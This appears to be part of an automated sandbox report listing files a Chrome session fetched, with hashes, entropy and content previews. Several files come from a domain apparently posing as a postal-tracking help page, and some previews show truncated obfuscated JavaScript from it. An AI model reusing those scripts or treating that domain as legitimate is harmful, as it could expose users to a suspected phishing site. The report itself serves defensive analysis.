                                                                                                                                                                                            Preview:.styles_shipmentTrackingPreviewModal__W8Vv6{position:fixed;top:0;right:0;left:0;bottom:0;background-color:rgba(0,0,0,.8);-webkit-backdrop-filter:blur(8px);-moz-backdrop-filter:blur(8px);-o-backdrop-filter:blur(8px);backdrop-filter:blur(8px);z-index:55;overflow-y:auto;transition:visibility .2s,opacity .2s ease-in-out}.styles_shipmentTrackingPreviewModal__W8Vv6>.styles_close__YK3MI{position:fixed;top:2rem;right:3rem;color:#fff;font-size:2rem;font-style:normal;cursor:pointer}.styles_shipmentTrackingPreviewModalOpen__fUMRq{visibility:visible!important;opacity:1!important}.styles_shipmentTracking__TSn_z{position:relative;display:flex;display:-ms-flexbox;flex-direction:row;flex-wrap:wrap;justify-content:space-evenly;align-items:center;width:100%;margin-top:5rem;margin-bottom:5rem;z-index:55}.styles_shipmentTracking__TSn_z>.styles_states__nQ6ze{display:flex;display:-ms-flexbox;flex-direction:column;justify-content:center;position:relative;z-index:5}.styles_shipmentTracking__TSn_z>.styles_stat
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):107769
                                                                                                                                                                                            Entropy (8bit):5.260222975099075
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:QEwre8DaBX8SWbVqLgZ/zxFTA89cdUi7xp5AM4//6pSC:QEO2BX8zzzeUi7x/A9wSC
                                                                                                                                                                                            MD5:610DA2CE6C9014742E009DBB54D06628
                                                                                                                                                                                            SHA1:2C1F903E8D6F628C54ABF209C8B4A27C848BF6A0
                                                                                                                                                                                            SHA-256:66724B029326372C20E74845946256FED8D27A064EB5CCE3B8DA31ACFD0FA028
                                                                                                                                                                                            SHA-512:D940574C28CC677CEA0DEEF46518C5F15107D3CBE099537601251ACCB3DAA63FE9634D8E8B5AA584F4D690189AD2B27BE8AC950325E8DE241A91850B6B3221E1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{3735:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.then((function(r){return t.resolve(e()).then((function(){return r}))}),(function(r){return t.resolve(e()).then((function(){throw r}))}))})},8565:function(e){var t=function(e){"use strict";var t,r=Object.proto
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (17553), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):17555
                                                                                                                                                                                            Entropy (8bit):5.212307168759353
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:BfZT1WkfJ4FOFDULEKALK2bq1pnv313SY7GhePO1yd816+hePXZ0dLXvLMOW4RxE:BGkf8eDeTEK2anv30uSZ6jeNMJl5ll
                                                                                                                                                                                            MD5:932AB86A485C5448691469792A137121
                                                                                                                                                                                            SHA1:3BA7F519F870F7664779F3765959D07971F6165D
                                                                                                                                                                                            SHA-256:8FB9EEF58678EAE781227CFAD2EAD48E90FDD5917AC83BC097225BA243B63F3B
                                                                                                                                                                                            SHA-512:D5B0B3B9566BBE7F51B1629C145E62DE854F440C19E9D47FC076D6F7A96BE8AC032F2BA935FCC6CB5C2FE2E08EE11750DBD2918C6E19939EEC4707DFAFFF2A42
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttem.alo-tech.com/chat/alochat.js?widget_key=ahRzfm11c3RlcmktaGl6bWV0bGVyaXIYCxILQ2hhdFdpZGdldHMYgICk1cbTrwgMogEScHR0ZW0uYWxvLXRlY2guY29t
                                                                                                                                                                                            Preview:var acjsFullsize = false;var MOBILE_SCREEN,focus_interval=0,acjs_near_left=!1;function AloChatDraw(t){var e,a,o;AloChat.alochat_page_title=document.title,AloChat.muteChat=!1,0<document.getElementsByClassName("alotech-chat-widget").length?console.log("chat widget already exists"):(e=document.createElement("div"),a=document.createElement("div"),AloChat.fullsize?(e.style.margin="0px",e.style.zIndex="9999999",e.style.backgroundColor="white",t.custom_properties&&t.custom_properties.master_page&&(".alotech-chat-widget"in(masterPageCss=t.custom_properties.master_page)&&masterPageCss[".alotech-chat-widget"].fullsize_status&&masterPageCss[".alotech-chat-widget"].fullsize_status.height&&(e.style.height=masterPageCss[".alotech-chat-widget"].fullsize_status.height),".alotech-chat-body"in masterPageCss)&&masterPageCss[".alotech-chat-body"].fullsize_status&&masterPageCss[".alotech-chat-body"].fullsize_status.height&&(a.style.height=masterPageCss[".alotech-chat-body"].fullsize_status.height)):(e.styl
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (322)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):323
                                                                                                                                                                                            Entropy (8bit):4.962097992563931
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:ZrXn6dB0HzMCRsCdgPbuxsMRIbVZptOzMmNoYmyCX:F6H0T4CkbuNmtg/1C
                                                                                                                                                                                            MD5:BFFC12E40F0D227772826CC4AB6B1D99
                                                                                                                                                                                            SHA1:348BED4D1364D4933BBFE5FEB5F9C61E3C5A1A6E
                                                                                                                                                                                            SHA-256:4CD1EC684CE1C4F864A8E95F9F7695C7F708160192531FF8E55FC5023ABF5B64
                                                                                                                                                                                            SHA-512:DC372EC6D46D3E58619E5F9DB56F4F26D683F79507EBB3A6F871B4D962BC1CB32B73362FCDFDACEB1692CE501ACD48575370C7B32E3C157FA9743CD2E7352B0A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/4cd1ec68kFGym.css
                                                                                                                                                                                            Preview:h1.title[data-v-fe5ae731]{color:#24549d;font-size:2rem;text-align:center}div.content[data-v-fe5ae731]{padding:10px;background-color:#f2f2f2;border-radius:3px}ul[data-v-fe5ae731]{list-style:disc outside none!important;list-style:initial!important}ul[data-v-fe5ae731]{padding-left:14px}ul li[data-v-fe5ae731]{margin-top:8px}.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):21895
                                                                                                                                                                                            Entropy (8bit):7.839028487142548
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:jPqsTPPq3PPqFPPqa/743sZpR/J3xMIqn3BU54X0q6+I9jstD/zS/VN/bAqkpAko:jPqsTPPq3PPqFPPqaD43sZD/Na53B8Ca
                                                                                                                                                                                            MD5:2521C5CB66A4D396A16637DC0B4AC309
                                                                                                                                                                                            SHA1:B96042B472F4C9386F739A69E52CA5D68DE760D7
                                                                                                                                                                                            SHA-256:BB65C7B6550153A9CE4BB0D9B5EF308F500CF188F465F68DE7B83D1A0E7B55DA
                                                                                                                                                                                            SHA-512:92D6FB984323E46AB0157F445187A6B14413D32408562B362C809C7770AF301F5F77A39FA9466C0B1D5B55BE9DADE5231402D6A0128398A650F406CB0CE46329
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..U.IDATx..O.#I...3.....^..".E..B.....U....rK...Reo.v.-.\......$.w7.a.X.k..H....k..w3.V,@.O.......v.N..#.......'~q...|......`..."....@......"......q.....8....@......"............8....@..... .............8....@..... .............8....D..... ..................D..... ......q...........D..... ......q...........D....."......q..........@......"......q.....8....@......"......q.....8....@......"............8....@..... .............8....D..... .............8....D..... ..................D..... ......q...........D..... ......q...........D....."......q..........@......"......q.....8....@......"......q.....8....@......"............8....@..... .............8....D..... .............8....D..... ..................D..... ......q...........D....."......q...........D....."......q..........@......"......q.....8....@......"......q.....8....@......"............8....@.....7~...>.........t!..@......0^...,.\B
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (6082), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6098
                                                                                                                                                                                            Entropy (8bit):5.345197330361691
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:XLD0GPxeMvMx+DCykuvej08WkE0EPO9n4gyk8gsubpme1C8Ed0UOa3NeS9eJSrBF:v0qeMkx+DCIveU8So4gyk8gsubpme1CT
                                                                                                                                                                                            MD5:0DA448566DB5D334688029F4D8DA8025
                                                                                                                                                                                            SHA1:9AE1FA7FEE699B2E08651E38850F4B73002191F2
                                                                                                                                                                                            SHA-256:B532E6762E739AB6A28B435316707D8D90BC1CFCF1BBF430127481320C64B2ED
                                                                                                                                                                                            SHA-512:9A29CB97F174931A186F465013B04939D63E18727D31235338976365E4C35588F98EEB50ADE4B087FD90D7B79D41514D3596D9C5446760A20773CCFF26663530
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:const a26_0x2f6b2e=a26_0x2195;(function(_0x4b26d5,_0x58f703){const _0x55ba02=a26_0x2195,_0x56ed15=_0x4b26d5();while(!![]){try{const _0x1c2f33=-parseInt(_0x55ba02(0x163))/0x1+-parseInt(_0x55ba02(0x19a))/0x2*(parseInt(_0x55ba02(0x160))/0x3)+parseInt(_0x55ba02(0x17c))/0x4*(-parseInt(_0x55ba02(0x172))/0x5)+parseInt(_0x55ba02(0x186))/0x6+-parseInt(_0x55ba02(0x185))/0x7+-parseInt(_0x55ba02(0x173))/0x8+parseInt(_0x55ba02(0x15f))/0x9;if(_0x1c2f33===_0x58f703)break;else _0x56ed15['push'](_0x56ed15['shift']());}catch(_0x3aa38c){_0x56ed15['push'](_0x56ed15['shift']());}}}(a26_0x2d8e,0xe16ee));const a26_0x523979=(function(){let _0x1acf99=!![];return function(_0x2d3219,_0x2027c3){const _0x24a505=_0x1acf99?function(){const _0x248cf8=a26_0x2195;if(_0x2027c3){const _0x626e42=_0x2027c3[_0x248cf8(0x18e)](_0x2d3219,arguments);return _0x2027c3=null,_0x626e42;}}:function(){};return _0x1acf99=![],_0x24a505;};}()),a26_0x5b0a0d=a26_0x523979(this,function(){const _0x177b71=a26_0x2195;return a26_0x5b0a0d[_0x177
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):10988
                                                                                                                                                                                            Entropy (8bit):7.850899696696491
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:LXQaP9egGbfXDRL6/6nIgj8Dvyn8b7ReJcWS1Mzvon0VEf6GdpE8kXa49:LXZPOz86Tn8b9vWky80G7kR
                                                                                                                                                                                            MD5:5779E1BC67CC9B240AAF6C72C3AD52B2
                                                                                                                                                                                            SHA1:61D74E5A57DB83F1E3B060CEF902BF35BE925F78
                                                                                                                                                                                            SHA-256:5ED2739E173ED5FB568A567AC79927A7EA6541E93DB63435966CEDE02783757F
                                                                                                                                                                                            SHA-512:E76E29933B4E766A4993F58DD5E13230E5F93235E1D3E506F36D73D4EAD0298D7EA5B963942B2F19FF9D6638F637F824CED0FE615CAB3FFBB05D1ADD07146B9F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..*yIDATx...OR.../`..;';.3.1... .q..g..W.YA..b.*.CV.YA.q.......m>N.iK.l...r%..,}.....~....../.G....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.............. ... ... ... ....q...q...q..B...B...B.................. ... ... ....q...q...q..B...B...B.................. ... ... ....q...q}...q..)..@..Oy..*..@..I..N... ...A...r...'....q..r..JQ..B\..gO5r... ..r..B...b.....9....D1..B\...r...'....q..r#....q..I....8A.....p..<.. ...uV..!..b..b......5t....B\...W.[..!....U.9.@.....!.A........!N....8.9.@.C.......rG....8...n. .JQ...G..gO5r....q.r.... ...q.r...'...B...r....B...&...8...8...8..!...!...!...!n......8..$.r.......B........q. .Q!.;........b.M.....p. .Q.m...........I.K..I....GO.\.>.....8z.......(j....I.K.n.?..3..q. ..p. .. .....p. .. w.@...c........%.1.....
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (17840), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):17840
                                                                                                                                                                                            Entropy (8bit):5.05052143987542
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:w58y3F4D2arxp2CygGCL1dylCL1J1i5iONdb9dJNdsoyVjU3kagh+hsr/2g1w:wV3F4K2xwbzWVjYXgchsDE
                                                                                                                                                                                            MD5:D0005C8D31546500BA92FED4EBA66850
                                                                                                                                                                                            SHA1:51290A4147664F5968BC24476181E92C27DABF70
                                                                                                                                                                                            SHA-256:925325FAAC0525494FFAA66AC114EDE355FDF6C2715B9C71D0176EA861A98294
                                                                                                                                                                                            SHA-512:8E7F6734C2ABC891FDA41FD3A6B6C1DFADCC932F93853C19860FC4C4B32BB546EA1319E175907D15DF65305FCD0A9B3A702B408CC99BBCF56149B23F841FB4B9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://chatserver.alo-tech.com/static/assets/js/linkify.html.min.js
                                                                                                                                                                                            Preview:if(!window.ACJS){window.ACJS={};}window.ACJS.linkifyHtml=function(t){"use strict";var e={amp:"&",gt:">",lt:"<",nbsp:" ",quot:'"'},i=/^#[xX]([A-Fa-f0-9]+)$/,n=/^#([0-9]+)$/,s=/^([A-Za-z0-9]+)$/,o=function(){function t(t){this.named=t}return t.prototype.parse=function(t){if(t){var e=t.match(i);return e?String.fromCharCode(parseInt(e[1],16)):(e=t.match(n))?String.fromCharCode(parseInt(e[1],10)):(e=t.match(s))?this.named[e[1]]||"&"+e[1]+";":void 0}},t}(),a=/[\t\n\f ]/,r=/[A-Za-z]/,h=/\r\n?/g;function u(t){return a.test(t)}function p(t){return r.test(t)}var c=function(){function t(t,e,i){void 0===i&&(i="precompile"),this.delegate=t,this.entityParser=e,this.mode=i,this.state="beforeData",this.line=-1,this.column=-1,this.input="",this.index=-1,this.tagNameBuffer="",this.states={beforeData:function(){var t=this.peek();if("<"!==t||this.isIgnoredEndTag()){if("precompile"===this.mode&&"\n"===t){var e=this.tagNameBuffer.toLowerCase();"pre"!==e&&"textarea"!==e||this.consume()}this.transitionTo("dat
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                            Entropy (8bit):3.875
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:H+uZYn:euZYn
                                                                                                                                                                                            MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                                                                                                                            SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                                                                                                                            SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                                                                                                                            SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnRMF4PivTGbBIFDZFhlU4=?alt=proto
                                                                                                                                                                                            Preview:CgkKBw2RYZVOGgA=
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2682
                                                                                                                                                                                            Entropy (8bit):4.4904670747715585
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:t4o1WOIsLcS4VCFTDOLLTuZQ161xxM1tltkOJXKu5PfPMXIiz6NcS4VCFTDOLLzx:pbLc3o2LTu+2F+amc3o2LU+GGBWGVH6I
                                                                                                                                                                                            MD5:A9DDCD4D865D3F2E85BDBB9BF38F73C6
                                                                                                                                                                                            SHA1:435CC4E8C5417268BECF4DE5021EDA6A558B6B11
                                                                                                                                                                                            SHA-256:38D713D08730A4398FB0AA408912957A0C19E1FFC8A4DA071547DBFA00C5E485
                                                                                                                                                                                            SHA-512:A3540ACC364E53A2E428F44BDD67D72293184FF5555692D0880C4C04EEB443D1CE41E2A7A9327D92DAA2BE93D0AE3BCA14DB571291DA3AE2269AA693EAD44A7E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" height="512pt" version="1.1" viewBox="-90 0 512 512.00001" width="512pt">.<g id="surface1">.<path d="M 331.964844 275.082031 C 331.964844 266.652344 325.128906 259.816406 316.695312 259.816406 C 308.261719 259.816406 301.425781 266.652344 301.425781 275.082031 C 301.425781 349.769531 240.667969 410.527344 165.980469 410.527344 C 91.296875 410.527344 30.539062 349.769531 30.539062 275.082031 C 30.539062 266.652344 23.703125 259.816406 15.269531 259.816406 C 6.835938 259.816406 0 266.652344 0 275.082031 C 0 361.460938 66.320312 432.621094 150.714844 440.355469 L 150.714844 481.460938 L 94.046875 481.460938 C 85.613281 481.460938 78.777344 488.296875 78.777344 496.730469 C 78.777344 505.164062 85.613281 512 94.046875 512 L 237.917969 512 C 246.347656 512 253.1875 505.164062 253.1875 496.730469 C 253.1875 488.296875 246.347656 481.460938 237.917969 481.460938 L 181.25 481.460938 L 181.25 440.355469 C 265.644531 432.625 331.964844 361.460938 331.96484
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (301)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):27231
                                                                                                                                                                                            Entropy (8bit):4.969538355156986
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:V4CBhTJwxFGFepFFVofu2NF2advHrGlmBpa/pe:zBEFGFepFvoGOkadvHz3Ke
                                                                                                                                                                                            MD5:2D53B06F292DCB355B5E1A39EC065054
                                                                                                                                                                                            SHA1:57CA25A18CBDEDF36973B712BC81F9E3F883A371
                                                                                                                                                                                            SHA-256:22A22E76F4DE930E54DD33AF00C71B68828847409E5E79787DF5224DD9776C6F
                                                                                                                                                                                            SHA-512:83C4394957069679994F7C04B1643AF895733E3469B539F9D202934FA5F808D31CB42EDF92029F23E849DEDD45EC50BB90D0009C3FA4450E8E50AB9C832313DA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://netdna.bootstrapcdn.com/font-awesome/3.2.1/css/font-awesome.css
                                                                                                                                                                                            Preview:/*!. * Font Awesome 3.2.1. * the iconic font designed for Bootstrap. * ------------------------------------------------------------------------------. * The full suite of pictographic icons, examples, and documentation can be. * found at http://fontawesome.io. Stay up to date on Twitter at. * http://twitter.com/fontawesome.. *. * License. * ------------------------------------------------------------------------------. * - The Font Awesome font is licensed under SIL OFL 1.1 -. * http://scripts.sil.org/OFL. * - Font Awesome CSS, LESS, and SASS files are licensed under MIT License -. * http://opensource.org/licenses/mit-license.html. * - Font Awesome documentation licensed under CC BY 3.0 -. * http://creativecommons.org/licenses/by/3.0/. * - Attribution is no longer required in Font Awesome 3.0, but much appreciated:. * "Font Awesome by Dave Gandy - http://fontawesome.io". *. * Author - Dave Gandy. * -------------------------------------------------------------
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (35443), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):35443
                                                                                                                                                                                            Entropy (8bit):5.338743939035259
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:8qiDiLzUsyD9YgG+UmAn2O1pRv42f9lUA7h2+JzQCjSpaZ/tgaTkU0ZAm/X1qnyw:8qOu42kEjzrpNX
                                                                                                                                                                                            MD5:BC5635E1DA3D2182E2FDC5D1FAAE7853
                                                                                                                                                                                            SHA1:40762193C4C05DAFAF5DD5E6DCE57608638FB847
                                                                                                                                                                                            SHA-256:0563B1A4C7810B2DA5B4D1762D4C3281B62C0B082D4EBB6ACECD2CF88CB9BB14
                                                                                                                                                                                            SHA-512:69C23223AAEE6A3C83133FA3C63C9A7AC361C8FDF0AF89BADF15A2D9CAFD132C0E0A42A77BD950B4539357F56082F5764897A849B9039C6F58DA7C82D9F6B938
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:var a23_0x2208a5=a23_0x1b94;(function(_0x171a22,_0x29dadb){var _0x13e885=a23_0x1b94,_0x13bea8=_0x171a22();while(!![]){try{var _0x4cc568=parseInt(_0x13e885(0x2c5))/0x1*(parseInt(_0x13e885(0x1e8))/0x2)+parseInt(_0x13e885(0x1fb))/0x3*(-parseInt(_0x13e885(0x265))/0x4)+-parseInt(_0x13e885(0x2aa))/0x5+-parseInt(_0x13e885(0x238))/0x6+-parseInt(_0x13e885(0x1cd))/0x7*(-parseInt(_0x13e885(0x263))/0x8)+-parseInt(_0x13e885(0x26f))/0x9+parseInt(_0x13e885(0x250))/0xa*(parseInt(_0x13e885(0x2ea))/0xb);if(_0x4cc568===_0x29dadb)break;else _0x13bea8['push'](_0x13bea8['shift']());}catch(_0x334a50){_0x13bea8['push'](_0x13bea8['shift']());}}}(a23_0x1a58,0x89c68));import{l as a23_0x492e05,_ as a23_0x185bee}from'./index-f5457718.js';import{r as a23_0x5e74b1}from'./09bf01f8JxKnW.js';import{m as a23_0x5e89b9}from'./ec21517bJxKnW.js';var E=function(_0x3be998,_0x2f67eb){var _0x5590cd=a23_0x1b94;return E=Object['setPrototy'+_0x5590cd(0x2d2)]||{'__proto__':[]}instanceof Array&&function(_0x773e98,_0x1801a7){var _0x3
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):224
                                                                                                                                                                                            Entropy (8bit):5.167357475223866
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:GnuZZtYsQijHpKk6td3bNNQOY6l70lkYOY:GnuZzYvijH8td3bxllnYOY
                                                                                                                                                                                            MD5:400E3C3B9D7F4839A95D93D351D109C1
                                                                                                                                                                                            SHA1:E21413CC081DA69ED57EA5AFC0960A94715E839E
                                                                                                                                                                                            SHA-256:C40304D98BEA1668EF7C5F0751D41916E149A4431162A011252D16F847879E65
                                                                                                                                                                                            SHA-512:1F84E04343C3090C2C1B7BA4A4C907B4B71390B7BC1F582D4818503F99A86D45578B73474ED95D3CB6A6156AE28147C3B5D70D35CF325DC6A3933F53DA49AC5D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISOgl8tXgV735fcBIFDZFhlU4SBQ2UVPrPEgUNg6hbPRIFDTQmxlsSBQ3qHyP2EgUNdGU6HhIFDXBgGagSEAnRMF4PivTGbBIFDZFhlU4SHglqRls8VkKTMRIFDZRU-s8SBQ2DqFs9EgUNNCbGWxIQCZXkj2o9pOObEgUN6h8j9hIXCQLIr2gxIw_3EgUNdGU6HhIFDXBgGag=?alt=proto
                                                                                                                                                                                            Preview:CksKBw2RYZVOGgAKCw2UVPrPGgQIBxgBCgsNg6hbPRoECAkYAQoLDTQmxlsaBAgNGAEKBw3qHyP2GgAKBw10ZToeGgAKBw1wYBmoGgAKCQoHDZFhlU4aAAouCgsNlFT6zxoECAcYAQoSDYOoWz0aBAgJGAEaBQigARgCCgsNNCbGWxoECA0YAQoJCgcN6h8j9hoAChIKBw10ZToeGgAKBw1wYBmoGgA=
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 625 x 417, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):14568
                                                                                                                                                                                            Entropy (8bit):7.831658911869208
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:suNkVU4jxZ2lHuxGgOorSNlmX//WNGclmwdc/qxES/tfJBX2NJAloDcrm6U2g+UJ:UrxslRgOoyIO4SFP/1JBW7T6U2OfwO
                                                                                                                                                                                            MD5:29B5B29D4D533AA3E60051A8E1AD8ADB
                                                                                                                                                                                            SHA1:B6059B2ADC66192B8A94FE52607121480AC6B389
                                                                                                                                                                                            SHA-256:7CA1F87B86C0FE5112F036C9F914A5F2496C625749C748B73A5A64636277E677
                                                                                                                                                                                            SHA-512:ACBF4002886324B4E8E9DC04ECAA4E3970858C69DDA62D05288631D3A31C9DFDF26AB8665426E0198F4A3A3FC8A1FBD43B8F2E0D4EF3EE65469E3F00E02066D4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/layout/images/34.png
                                                                                                                                                                                            Preview:.PNG........IHDR...q..........[.....pHYs...#...#.x.?v....tEXtSoftware.Adobe ImageReadyq.e<..8uIDATx...=V......=s...MD.&"...4.W.....X...9.X.EHd..Y.`Px#..wU.Y.._......s4....*u.~]....................B.....q....8........@.... ..........B....!.....8........@.... ..........B....!.....8.........q... .........@.....!.....8.........q... .........@.....!.....8...B.....q... .........@.....!.....8...B.....q... .........@.....!.........B.....q....8........@.....!.........B.....q....8........@.... ..........B.....q....8........@.... ..........B....!.....8.........q... ..........B....!.....8.........q....0}.)....q..,}.. 7.(..h.w...B......~M...c......^..E....r8O.ca.}.....,...y....y.X..c..q.*....\..!...9i.;5..J...q...5....?I......v...M..........W.W...|...o...U.....8....qh>....../.y,.P7..:..Fz...d.3.e6........1..'..Q...L.q.U....|../.]-...4?.....6........i.....z..c...4s.......q. .I.qU..p...'.....s+.[.un.j.YZf.C.jI..c.V..m.c.a.@=.P.."....{.]T....8Y..y.[..8~XR.Qh..3r~.H....lw
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (59842), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):115111
                                                                                                                                                                                            Entropy (8bit):5.535367167236125
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:idizI7WC3KXhmbMCuGIwduyEoJgxXWH0XtJhjp975cHrYrgn3ZeE+FLY24eAGx:BQzTbTdBdriTh7752NDu
                                                                                                                                                                                            MD5:5634919A771FA502E0CD602659B9EE3E
                                                                                                                                                                                            SHA1:5CF5D399FFDD13D5425DE9C4B290909E3E6219FB
                                                                                                                                                                                            SHA-256:4991B8E3F096D97A1ED0B4D6767E093DED9F95DB1664C7842807ED13699654CA
                                                                                                                                                                                            SHA-512:1FF880E61F2A17CDB0FEBE95E60229661CE8426C2B07C883CB02DD8CE21EF91DF6E62307D138CFAA7B91FA8C129FD303D12FF4B7F5EF61692E6BD3EE8F3704A4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://pttroqtr.top/help/assets/164f9b57JxKnW.js
